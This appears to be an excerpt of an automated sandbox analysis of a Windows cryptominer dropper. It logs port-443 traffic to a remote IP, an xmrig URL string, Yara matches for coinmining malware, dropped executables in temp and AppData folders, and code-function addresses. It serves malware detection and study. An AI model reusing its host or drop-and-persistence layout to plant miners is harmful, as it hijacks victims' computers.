                  Source: Driver.exe, 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://xmrig.com/wizard
                  Source: Driver.exe, 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://xmrig.com/wizard%s
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49737 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49749 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49755 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49834 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49837 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49878 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 4.0.yondex.exe.690000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                  Source: 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: Process Memory Space: Driver.exe PID: 7280, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65592C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF65592C2F0
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559349280_2_00007FF655934928
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65592F9300_2_00007FF65592F930
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559507540_2_00007FF655950754
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65594B1900_2_00007FF65594B190
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65593A4AC0_2_00007FF65593A4AC
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65594CE880_2_00007FF65594CE88
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655925E240_2_00007FF655925E24
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559276C00_2_00007FF6559276C0
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559625500_2_00007FF655962550
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65595C8380_2_00007FF65595C838
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559248400_2_00007FF655924840
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65592C2F00_2_00007FF65592C2F0
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65592A3100_2_00007FF65592A310
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65593126C0_2_00007FF65593126C
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559272880_2_00007FF655927288
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559421D00_2_00007FF6559421D0
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65593F1800_2_00007FF65593F180
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65593B5340_2_00007FF65593B534
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559434840_2_00007FF655943484
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559453F00_2_00007FF6559453F0
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65593AF180_2_00007FF65593AF18
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655941F200_2_00007FF655941F20
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655948DF40_2_00007FF655948DF4
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559507540_2_00007FF655950754
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655942D580_2_00007FF655942D58
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559620800_2_00007FF655962080
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655965AF80_2_00007FF655965AF8
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655931A480_2_00007FF655931A48
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655921AA40_2_00007FF655921AA4
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655942AB00_2_00007FF655942AB0
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65595FA940_2_00007FF65595FA94
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559439640_2_00007FF655943964
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65593C96C0_2_00007FF65593C96C
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559589A00_2_00007FF6559589A0
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655958C1C0_2_00007FF655958C1C
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655935B600_2_00007FF655935B60
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655944B980_2_00007FF655944B98
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65593BB900_2_00007FF65593BB90
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB49F9303_2_00007FF7AB49F930
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4A49283_2_00007FF7AB4A4928
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4BCE883_2_00007FF7AB4BCE88
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB495E243_2_00007FF7AB495E24
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4AA4AC3_2_00007FF7AB4AA4AC
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4BB1903_2_00007FF7AB4BB190
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4C07543_2_00007FF7AB4C0754
